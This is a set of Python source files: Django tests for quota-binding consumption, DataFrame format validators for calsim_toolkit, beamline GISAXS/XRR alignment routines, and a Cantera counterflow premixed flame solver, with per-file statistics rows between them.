self.resource.set_attribute(self.attribute_definition_2, 32)
self.resource_2 = Resource.objects.create(name='test_update_2', resource_group=self.resource_group,
service_catalog_instance=self.instance)
self.resource_2.set_attribute(self.attribute_definition, 16)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 16 * 2)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
self.resource_3 = Resource.objects.create(name='test_update_3', resource_group=self.resource_group,
service_catalog_instance=self.instance_2)
self.resource_3.set_attribute(self.attribute_definition, 16)
self.resource_4 = Resource.objects.create(name='test_update_4', resource_group=self.resource_group,
service_catalog_instance=self.instance_2)
self.resource_4.set_attribute(self.attribute_definition, 16)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 4 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_instance_changed_in_resource_with_same_bg(self):
self._set_up_update_consumed()
self.resource_4.service_catalog_instance = self.instance
with mock.patch("service_catalog.tasks.async_quota_bindings_add_resource.delay",
wraps=async_quota_bindings_add_resource):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_resource.delay",
wraps=async_quota_bindings_remove_resource):
self.resource_4.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 4 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_instance_removed_in_resource(self):
self._set_up_update_consumed()
self.resource_4.service_catalog_instance = None
with mock.patch("service_catalog.tasks.async_quota_bindings_add_resource.delay",
wraps=async_quota_bindings_add_resource):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_resource.delay",
wraps=async_quota_bindings_remove_resource):
self.resource_4.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 3 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_instance_changed_in_resource_with_different_bg(self):
self._set_up_update_consumed()
self.resource_4.service_catalog_instance = self.instance_3
with mock.patch("service_catalog.tasks.async_quota_bindings_add_resource.delay",
wraps=async_quota_bindings_add_resource):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_resource.delay",
wraps=async_quota_bindings_remove_resource):
self.resource_4.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 3 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 1 * 16)
def test_instance_changed_in_resource_without_bg(self):
self._set_up_update_consumed()
self.resource_4.service_catalog_instance = self.instance_4
with mock.patch("service_catalog.tasks.async_quota_bindings_add_resource.delay",
wraps=async_quota_bindings_add_resource):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_resource.delay",
wraps=async_quota_bindings_remove_resource):
self.resource_4.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 3 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_bg_changed_in_instance(self):
self._set_up_update_consumed()
self.instance.billing_group = self.billing_group_2
with mock.patch("service_catalog.tasks.async_quota_bindings_add_instance.delay", wraps=async_quota_bindings_add_instance):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_instance.delay", wraps=async_quota_bindings_remove_instance):
self.instance.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 2 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 2 * 16)
def test_bg_removed_in_instance(self):
self._set_up_update_consumed()
self.instance.billing_group = None
with mock.patch("service_catalog.tasks.async_quota_bindings_add_instance.delay", wraps=async_quota_bindings_add_instance):
with mock.patch("service_catalog.tasks.async_quota_bindings_remove_instance.delay", wraps=async_quota_bindings_remove_instance):
self.instance.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 2 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_delete_rg(self):
self._set_up_update_consumed()
count = 0
for resource in self.resource_group.resources.all():
count += resource.attributes.count()
with mock.patch(
"service_catalog.tasks.async_resource_attribute_quota_bindings_update_consumed.delay", wraps=async_resource_attribute_quota_bindings_update_consumed):
self.resource_group.delete()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 0)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_delete_resource(self):
self._set_up_update_consumed()
with mock.patch(
"service_catalog.tasks.async_resource_attribute_quota_bindings_update_consumed.delay", wraps=async_resource_attribute_quota_bindings_update_consumed):
self.resource.delete()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 3 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_delete_instance(self):
self._set_up_update_consumed()
count = 0
for resource in self.instance.resources.all():
count += resource.attributes.count()
with mock.patch(
"service_catalog.tasks.async_resource_attribute_quota_bindings_update_consumed.delay", wraps=async_resource_attribute_quota_bindings_update_consumed):
self.instance.delete()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 2 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_attribute_definitions_added_in_quota_attribute(self):
self._set_up_update_consumed()
with mock.patch("service_catalog.tasks.async_quota_bindings_update_consumed.delay", wraps=async_quota_bindings_update_consumed):
self.quota_attribute.attribute_definitions.add(self.attribute_definition_2)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 4 * 16 + 32)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_attribute_definitions_removed_in_quota_attribute(self):
self._set_up_update_consumed()
with mock.patch("service_catalog.tasks.async_quota_bindings_update_consumed.delay", wraps=async_quota_bindings_update_consumed):
self.quota_attribute.attribute_definitions.remove(self.attribute_definition)
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 0)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
def test_tasks_quota_update_consumed(self):
self._set_up_update_consumed()
quota_binding_value = dict()
for binding in self.quota_attribute.quota_bindings.all():
quota_binding_value[binding.id] = binding.consumed
wrong_value = 9999999
for binding in self.quota_attribute.quota_bindings.all():
binding.consumed = wrong_value
binding.save()
async_quota_bindings_update_consumed(self.quota_attribute.id)
for binding in self.quota_attribute.quota_bindings.all():
self.assertNotEqual(binding.consumed, wrong_value)
self.assertEqual(binding.consumed, quota_binding_value.get(binding.id))
def test_value_changed_in_resource_attribute(self):
self._set_up_update_consumed()
attribute = self.resource.attributes.first()
with mock.patch("service_catalog.tasks.async_resource_attribute_quota_bindings_update_consumed.delay", wraps=async_resource_attribute_quota_bindings_update_consumed):
attribute.value += 16
attribute.save()
self.quota_binding.refresh_from_db()
self.assertEqual(self.quota_binding.consumed, 5 * 16)
self.quota_binding_2.refresh_from_db()
self.assertEqual(self.quota_binding_2.consumed, 0)
| 56.872807
| 174
| 0.726151
| 1,610
| 12,967
| 5.444721
| 0.056522
| 0.085216
| 0.133242
| 0.090349
| 0.876454
| 0.856035
| 0.791695
| 0.753365
| 0.704084
| 0.678074
| 0
| 0.015178
| 0.192103
| 12,967
| 227
| 175
| 57.123348
| 0.821592
| 0.003162
| 0
| 0.578431
| 0
| 0
| 0.106786
| 0.093632
| 0
| 0
| 0
| 0
| 0.171569
| 1
| 0.088235
| false
| 0
| 0.029412
| 0
| 0.122549
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
36b6aa56003524fa9b82afaab7665b9fcaebbcd7
| 3,963
|
py
|
Python
|
tools/validation.py
|
pyRobShrk/calsim_toolkit
|
ca6d63f6a89757f06b53d646da9310ea77446f13
|
[
"MIT"
] | 1
|
2020-01-09T22:18:13.000Z
|
2020-01-09T22:18:13.000Z
|
tools/validation.py
|
pyRobShrk/calsim_toolkit
|
ca6d63f6a89757f06b53d646da9310ea77446f13
|
[
"MIT"
] | 15
|
2020-01-07T01:05:47.000Z
|
2021-06-16T16:12:21.000Z
|
tools/validation.py
|
pyRobShrk/calsim_toolkit
|
ca6d63f6a89757f06b53d646da9310ea77446f13
|
[
"MIT"
] | 3
|
2020-03-06T18:10:09.000Z
|
2021-06-16T16:20:16.000Z
|
"""
Summary
-------
The purpose of this module is to validate data structures produced by the
`calsim_toolkit` library.
"""
# %% Import libraries.
# Import third party libraries.
import pandas as pd
# %% Define functions.
def is_catalog(df, verbose=False):
# Ensure input is a DataFrame.
if not isinstance(df, pd.DataFrame):
msg = 'Input must be a pandas DataFrame.'
# Make sure columns are appropriate.
val_col = ['File Path', 'Pathname']
if 'Study' in df.columns:
val_col += ['Study']
if (set(val_col) != set(df.columns)):
if verbose:
msg = ('DataFrame columns do not match catalog format'
' specifications.')
print(msg)
return False
# Return success.
return True
def is_tidy(df, verbose=False):
# Ensure input is a DataFrame.
if not isinstance(df, pd.DataFrame):
msg = 'Input must be a pandas DataFrame.'
# Make sure columns are appropriate.
val_col = ['DateTime', 'Pathname', 'Units', 'Data Type', 'Value']
if 'Study' in df.columns:
val_col += ['Study']
if (set(val_col) != set(df.columns)):
if verbose:
msg = 'DataFrame columns do not match tidy format specifications.'
print(msg)
return False
# Check that there are no duplicates.
check_col = list(set(val_col) - set(['Value']))
duplicates = df.duplicated(check_col, keep=False)
if duplicates.any():
if verbose:
print(df.loc[duplicates, :])
msg = ('DataFrame contains duplicate records (shown above).'
' Please, remove duplicate data.')
print(msg)
return False
# Return success.
return True
def is_wide(df, verbose=False):
# Ensure input is a DataFrame.
if not isinstance(df, pd.DataFrame):
msg = 'Input must be a pandas DataFrame.'
# Make sure level names are appropriate.
val_lvl = ['Part A', 'Part B', 'Part C', 'Part E',
'Part F', 'Units', 'Data Type']
if 'Study' in df.columns.names:
val_lvl += ['Study']
if (set(val_lvl) != set(df.columns.names)):
if verbose:
msg = ('DataFrame column level names do not match wide format'
' specifications.')
print(msg)
return False
# Check that there are no duplicate column headers.
duplicates = df.columns.duplicated(keep=False)
if duplicates.any():
if verbose:
print(df.loc[:, duplicates])
msg = ('DataFrame contains duplicate columns (shown above).'
' Please, remove duplicate data.')
print(msg)
return False
# Return success.
return True
def is_condense(df, verbose=False):
# Ensure input is a DataFrame.
if not isinstance(df, pd.DataFrame):
msg = 'Input must be a pandas DataFrame.'
# Make sure level names are appropriate.
val_lvl = ['Part A', 'Part B', 'Part C', 'Part E',
'Part F', 'Units & Type']
if 'Study' in df.columns.names:
val_lvl += ['Study']
if not (set(df.columns.names) <= set(val_lvl)):
if verbose:
msg = ('DataFrame column level names do not match condense format'
' specifications.')
print(msg)
return False
# Check that there are no duplicate column headers.
duplicates = df.columns.duplicated(keep=False)
if duplicates.any():
if verbose:
print(df.loc[:, duplicates])
msg = ('DataFrame contains duplicate columns (shown above).'
' Please, remove duplicate data.')
print(msg)
return False
# Return success.
return True
# %% Execute script.
if __name__ == '__main__':
msg = ('This module is intended to be imported for use into another'
' module. It is not intended to be run as a __main__ file.')
raise RuntimeError(msg)
| 33.025
| 78
| 0.591723
| 487
| 3,963
| 4.749487
| 0.223819
| 0.038911
| 0.042369
| 0.057501
| 0.771293
| 0.771293
| 0.762646
| 0.762646
| 0.762646
| 0.762646
| 0
| 0
| 0.299016
| 3,963
| 119
| 79
| 33.302521
| 0.832613
| 0.169316
| 0
| 0.722892
| 0
| 0
| 0.28974
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048193
| false
| 0
| 0.024096
| 0
| 0.204819
| 0.120482
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
36d4ceea6ff8fb8bf8338df3bdbc6de8541a6a9a
| 13,038
|
py
|
Python
|
startup/37-Alignement.py
|
NSLS-II-SMI/profile_collection
|
c1e2236a7520f605ac85e7591f05682add06357c
|
[
"BSD-3-Clause"
] | null | null | null |
startup/37-Alignement.py
|
NSLS-II-SMI/profile_collection
|
c1e2236a7520f605ac85e7591f05682add06357c
|
[
"BSD-3-Clause"
] | 13
|
2018-09-25T19:35:08.000Z
|
2021-01-15T20:42:26.000Z
|
startup/37-Alignement.py
|
NSLS-II-SMI/profile_collection
|
c1e2236a7520f605ac85e7591f05682add06357c
|
[
"BSD-3-Clause"
] | 3
|
2019-09-06T01:40:59.000Z
|
2020-07-01T20:27:39.000Z
|
import matplotlib.pyplot as plt
import numpy as np
print(f'Loading {__file__}')
def align_gisaxs_height(rang=0.3, point=31, der=False):
yield from bp.rel_scan([pil1M], piezo.y, -rang, rang, point)
ps(der=der, plot = False)
yield from bps.mv(piezo.y, ps.cen)
def align_gisaxs_height_rb(rang=0.3, point=31, der=False):
yield from bp.rel_scan([pil1M], piezo.y, -rang, rang, point)
ps(der=der, plot = False)
yield from bps.mv(piezo.y, ps.peak)
def align_gisaxs_th(rang=0.3, point=31):
yield from bp.rel_scan([pil1M], piezo.th, -rang, rang, point)
ps(plot = False)
yield from bps.mv(piezo.th, ps.peak)
def align_xrr_prs(rang=0.3, point=31):
yield from bp.rel_scan([pil1M], prs, -rang, rang, point)
ps(plot = False)
yield from bps.mv(prs, ps.peak)
def align_xrr_height(rang=0.3, point=31, der=False):
yield from bp.rel_scan([pil1M], piezo.x, -rang, rang, point)
ps(der=der, plot = False)
yield from bps.mv(piezo.x, ps.peak)
def align_gisaxs_height_hex(rang=0.3, point=31, der=False):
yield from bp.rel_scan([pil1M], stage.y, -rang, rang, point)
ps(der=der,plot = False)
yield from bps.mv(stage.y, ps.cen)
def align_gisaxs_th_hex(rang=0.3, point=31):
yield from bp.rel_scan([pil1M], stage.th, -rang, rang, point)
ps(plot = False)
yield from bps.mv(stage.th, ps.peak)
def alignement_gisaxs(angle=0.15):
"""
Regular alignement routine for gisaxs and giwaxs. First, scan of the sample height and incident angle on the direct beam.
Then scan of teh incident angle, height and incident angle again on the reflected beam.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3, 0.3)
smi = SMI_Beamline()
yield from smi.modeAlignment(technique='gisaxs')
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan theta and height
yield from align_gisaxs_height(800, 21, der=True)
yield from align_gisaxs_th(1.5, 27)
# move to theta 0 + value
yield from bps.mv(piezo.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle, technique='gisaxs')
# Scan theta and height
yield from align_gisaxs_th(0.2, 21)
yield from align_gisaxs_height_rb(150, 16)
yield from align_gisaxs_th(0.025, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(piezo.th, ps.cen - angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_gisaxs_doblestack(angle=0.15):
"""
Modification of teh regular alignement routine for the doble-stack. Since top row is out of the center of rotation of of theta, the alignement on teh direc does not work.
Therefore, only teh height is aligned on the direct beam but the incident angle is aligned on the reflected beam with a small incident angle.
The alignement on the reflected beam is the same as for regular alignement.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3, 0.3)
smi = SMI_Beamline()
yield from smi.modeAlignment(technique='gisaxs')
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan height on the DB only
yield from align_gisaxs_height(800, 21, der=True)
# alignement of incident angle at ai = 0.1 deg so the alignement use the reflected roi not sitting on the db position
yield from smi.setReflectedBeamROI(total_angle=0.1, technique='gisaxs')
yield from align_gisaxs_th(1.5, 27)
# move to theta 0 + value
yield from bps.mv(piezo.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle, technique='gisaxs')
# Scan theta and height
yield from align_gisaxs_th(0.2, 21)
yield from align_gisaxs_height_rb(150, 16)
yield from align_gisaxs_th(0.025, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(piezo.th, ps.cen - angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_gisaxs_multisample(angle=0.15):
"""
This is design to align several samples at the same time. The attenuators, bs motion, ... needs to be done outside of this maccro, so there is no back and forth in term
of motor motion from sample to sample.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.5, 0.5)
smi = SMI_Beamline()
# yield from smi.modeAlignment(technique='gisaxs')
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan theta and height
yield from align_gisaxs_height(700, 16, der=True)
yield from align_gisaxs_th(1, 15)
yield from align_gisaxs_height(300, 11, der=True)
yield from align_gisaxs_th(0.5, 16)
# move to theta 0 + value
yield from bps.mv(piezo.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle, technique='gisaxs')
# Scan theta and height
yield from align_gisaxs_th(0.2, 31)
yield from align_gisaxs_height_rb(150, 21)
yield from align_gisaxs_th(0.025, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(piezo.th, ps.cen - angle)
# yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_gisaxs_hex(angle=0.1):
"""
Regular alignement routine for gisaxs and giwaxs using the hexapod. First, scan of the sample height and incident angle on the direct beam.
Then scan of teh incident angle, height and incident angle again on the reflected beam.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.5, 0.5)
smi = SMI_Beamline()
yield from smi.modeAlignment()
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan theta and height
yield from align_gisaxs_height_hex(0.5, 21, der=True)
yield from align_gisaxs_th_hex(0.5, 11)
# move to theta 0 + value
yield from bps.mv(stage.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle, technique='gisaxs')
# Scan theta and height
yield from align_gisaxs_th_hex(0.3, 21)
yield from align_gisaxs_height_hex(0.1, 21)
yield from align_gisaxs_th_hex(0.05, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(stage.th, ps.cen - angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_gisaxs_hex_short(angle = 0.12):
"""
Short alignement routine for gisaxs and giwaxs using the hexapod. First, scan of the sample height and incident angle on the direct beam.
Then scan of teh incident angle, height and incident angle again on the reflected beam.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3, 0.3)
smi = SMI_Beamline()
yield from smi.modeAlignment()
# Set direct beam ROI
yield from smi.setDirectBeamROI()
# Scan theta and height
yield from align_gisaxs_height_hex(0.500, 21, der=True)
# move to theta 0 + value
yield from bps.mvr(stage.th, angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle)
# Scan theta and height
yield from align_gisaxs_th_hex(0.7, 23)
yield from align_gisaxs_height_hex(0.15, 31)
yield from align_gisaxs_th_hex(0.06, 25)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(stage.th, ps.cen-angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def quickalign_gisaxs(angle = 0.15):
"""
Short alignement with only alignement on the reflected beam.
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.3, 0.3)
smi = SMI_Beamline()
yield from smi.modeAlignment()
# move to theta 0 + value
yield from bps.mv(piezo.th, ps.peak + angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=angle)
# Scan theta and height
yield from align_gisaxs_height_rb(200, 31)
yield from align_gisaxs_th(0.1, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(piezo.th, ps.cen - angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
def alignement_xrr(angle=0.15):
"""
This routine is for samples mounted at 90 degrees, so the alignement is done using prs stage as incident angle and piezo.x as height
param angle: np.float. Angle at which the alignement on the reflected beam will be done
"""
#Activate the automated derivative calculation
bec._calc_derivative_and_stats = True
sample_id(user_name='test', sample_name='test')
det_exposure_time(0.5, 0.5)
smi = SMI_Beamline()
yield from smi.modeAlignment(technique='xrr')
# Set direct beam ROI
yield from smi.setDirectBeamROI(technique='xrr')
# Scan theta and height
yield from align_xrr_height(800, 16, der=True)
# For XRR alignment, a poor results was obtained at incident angle 0. To improve the alignment success
# the prs alignment is done at an angle of 0.15 deg
yield from smi.setReflectedBeamROI(total_angle=-0.15, technique='xrr')
yield from align_xrr_prs(1, 20)
yield from smi.setDirectBeamROI()
yield from align_xrr_height(500, 13, der=True)
yield from smi.setReflectedBeamROI(total_angle=-0.15, technique='xrr')
yield from align_xrr_prs(0.5, 21)
yield from bps.mv(prs, ps.peak + 0.0725)
# move to theta 0 + value
yield from bps.mv(prs, ps.peak - angle)
# Set reflected ROI
yield from smi.setReflectedBeamROI(total_angle=-2*angle, technique='xrr')
# Scan theta and height
yield from align_xrr_prs(0.2, 31)
yield from align_xrr_height(200, 21)
yield from align_xrr_prs(0.05, 21)
# Close all the matplotlib windows
plt.close('all')
# Return angle
yield from bps.mv(prs, ps.cen + angle)
yield from smi.modeMeasurement()
#Deactivate the automated derivative calculation
bec._calc_derivative_and_stats = False
| 34.492063
| 178
| 0.636447
| 1,805
| 13,038
| 4.469252
| 0.105817
| 0.105987
| 0.060741
| 0.069419
| 0.854469
| 0.837858
| 0.818396
| 0.778604
| 0.75815
| 0.743523
| 0
| 0.029355
| 0.2867
| 13,038
| 377
| 179
| 34.583554
| 0.838065
| 0.314619
| 0
| 0.610063
| 0
| 0
| 0.017679
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08805
| false
| 0
| 0.012579
| 0
| 0.100629
| 0.006289
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7fd29797b5349f25f952a69bf6fcc646ff774ce4
| 7,421
|
py
|
Python
|
ctutils/driver/counterflow_premixed_flame.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
ctutils/driver/counterflow_premixed_flame.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
ctutils/driver/counterflow_premixed_flame.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
# one stream unburnt, one stream equilibrium
#%%
import numpy as np
import cantera as ct
import pyutils.ctutils.gas as cg
from pyutils.filename import params2name
# %%
def counterflow_premixed_flame(
chemistry = 'gri30.xml',
fuel = {'CH4':1.},
oxidizer = {'O2':1, 'N2':3.76},
temperature = 300.,
pressure = 1.,
phi = 1.,
a = 1000.,
solution = None,
**kwargs
):
# for unrealistic parameters
if pressure < 0.:
raise ValueError('Negative pressure')
if temperature < 0.:
raise ValueError('Negative inlet temperature')
if phi < 0.:
raise ValueError('Negative equivalence ratio')
# read kwargs
if 'transport' in kwargs.keys():
transport = kwargs['transport']
else:
transport = 'Mix'
if 'width' in kwargs.keys():
width = kwargs['width']
else:
width = 0.05
if 'loglevel' in kwargs.keys():
loglevel = kwargs['loglevel']
else:
# supress log output
loglevel = 0
# kwargs for flame solver
if 'ct_ratio' in kwargs.keys():
ct_ratio = kwargs['ct_ratio']
else:
ct_ratio = 2.
if 'ct_slope' in kwargs.keys():
ct_slope = kwargs['ct_slope']
else:
ct_slope = 0.02
if 'ct_curve' in kwargs.keys():
ct_curve = kwargs['ct_curve']
else:
ct_curve = 0.02
if 'ct_prune' in kwargs.keys():
ct_prune = kwargs['ct_prune']
else:
ct_prune = 0.01
if 'ct_max_grids' in kwargs.keys():
ct_max_grids = kwargs['ct_max_grids']
else:
ct_max_grids = 5000
# case name
params = {}
params['T'] = temperature
params['p'] = pressure
params['phi'] = phi
params['a'] = a
case = params2name(params)
# pressure
pressure *= ct.one_atm
# gas object
#gas = ct.Solution(chemistry)
# construct mixutre
#mixture = cg.mixture_two_streams(gas, fuel, oxidizer, phi)
# unburnt stream
#gas.TPX = temperature, pressure, mixture
gas = cg.mixture(chemistry, fuel, oxidizer, temperature, pressure, phi)
rho_u = gas.density
# burnt stream
gas.equilibrate('HP')
rho_b = gas.density
gas = cg.mixture(chemistry, fuel, oxidizer, temperature, pressure, phi)
# get inlet velocity based on the strain rate
# $a_1=\dfrac{2U_1}{L}\left(1+\dfrac{U_2\sqrt{\rho_2}}{U_1\sqrt{\rho_1}}\right)$
# $a_2=\dfrac{2U_2}{L}\left(1+\dfrac{U_1\sqrt{\rho_1}}{U_2\sqrt{\rho_2}}\right)$
# with $\rho_1 U_1^2 = \rho_2 U_2^2$
# $a_1=\dfrac{4U_1}{L}$ $a_2=\dfrac{4U_2}{L}$
# set stream 1 and 2 for unburnt and equilibrium status respectively
v_u = a * width / 4.0
v_b = np.sqrt( rho_u*np.square(v_u) / rho_b )
# mass rate
m_u = rho_u * v_u
m_b = rho_b * v_b
# Create flame object
f = ct.CounterflowPremixedFlame(gas=gas, width=width)
f.transport_model = transport
f.P = pressure
f.reactants.mdot = m_u
f.products.mdot = m_b
f.set_refine_criteria(ratio=ct_ratio,
slope=ct_slope,
curve=ct_curve,
prune=ct_prune)
f.set_max_grid_points(f.flame, ct_max_grids)
# load saved case if presented
if solution is not None:
f.restore(solution, loglevel=loglevel)
# scaling of saved solution
solution_width = f.grid[-1] - f.grid[0]
width_factor = width / solution_width
solution_a = 4.*f.u[0]/solution_width
a_factor = a / solution_a
normalized_grid = f.grid / solution_width
u_factor = a_factor * width_factor
# update solution initialization following Fiala & Sattelmayer
f.flame.grid = normalized_grid * width
f.set_profile('u', normalized_grid, f.u*u_factor)
f.set_profile('V', normalized_grid, f.V*a_factor)
f.set_profile('lambda', normalized_grid, f.L*np.square(a_factor))
f.reactants.mdot = m_u
f.products.mdot = m_b
else:
f.set_initial_guess()
f.solve(loglevel=loglevel, auto=True)
HRR = f.heat_release_rate
idx = HRR.argmax()
if HRR[idx] > 1000 :
f.save('{}.xml'.format(case))
if f.u[idx] > 0 :
return 0
else :
return 2
else:
return 1
# %%
# pass the reactant obj, return flame obj
# %%
# pass the reactant obj, return flame obj
def counterflow_premixed_flame_(
        gas,
        a=1000.,
        solution=None,
        **kwargs):
    """Solve a counterflow premixed flame for the given reactant mixture.

    Parameters
    ----------
    gas :
        Reactant mixture object (Cantera ``Solution``); its current state
        defines the unburnt stream. NOTE: the object is mutated — it is
        equilibrated at constant (H, P) to obtain the burnt-stream density.
    a : float, optional
        Strain rate [1/s] used to derive the inlet velocities.
    solution : str, optional
        Path of a previously saved flame solution to restore and rescale.
    **kwargs
        transport : str, transport model (default ``'Mix'``)
        width : float, domain width [m] (default 0.05)
        loglevel : int, Cantera log verbosity (default 0, silent)
        ct_ratio, ct_slope, ct_curve, ct_prune : grid refinement criteria
        ct_max_grids : int, maximum number of grid points (default 5000)

    Returns
    -------
    The solved ``CounterflowPremixedFlame`` object.
    """
    # Read kwargs with defaults; dict.get replaces the original verbose
    # "if key in kwargs.keys(): ... else: ..." chains (same semantics).
    transport = kwargs.get('transport', 'Mix')
    width = kwargs.get('width', 0.05)
    # suppress log output by default
    loglevel = kwargs.get('loglevel', 0)
    # kwargs for flame solver
    ct_ratio = kwargs.get('ct_ratio', 2.)
    ct_slope = kwargs.get('ct_slope', 0.2)
    ct_curve = kwargs.get('ct_curve', 0.2)
    ct_prune = kwargs.get('ct_prune', 0.1)
    ct_max_grids = kwargs.get('ct_max_grids', 5000)
    # Create flame object
    f = ct.CounterflowPremixedFlame(gas=gas, width=width)
    # unburnt stream density
    rho_u = gas.density
    # burnt stream density from constant-(H, P) equilibrium
    gas.equilibrate('HP')
    rho_b = gas.density
    # get inlet velocity based on the strain rate
    # $a_1=\dfrac{2U_1}{L}\left(1+\dfrac{U_2\sqrt{\rho_2}}{U_1\sqrt{\rho_1}}\right)$
    # $a_2=\dfrac{2U_2}{L}\left(1+\dfrac{U_1\sqrt{\rho_1}}{U_2\sqrt{\rho_2}}\right)$
    # with $\rho_1 U_1^2 = \rho_2 U_2^2$
    # $a_1=\dfrac{4U_1}{L}$ $a_2=\dfrac{4U_2}{L}$
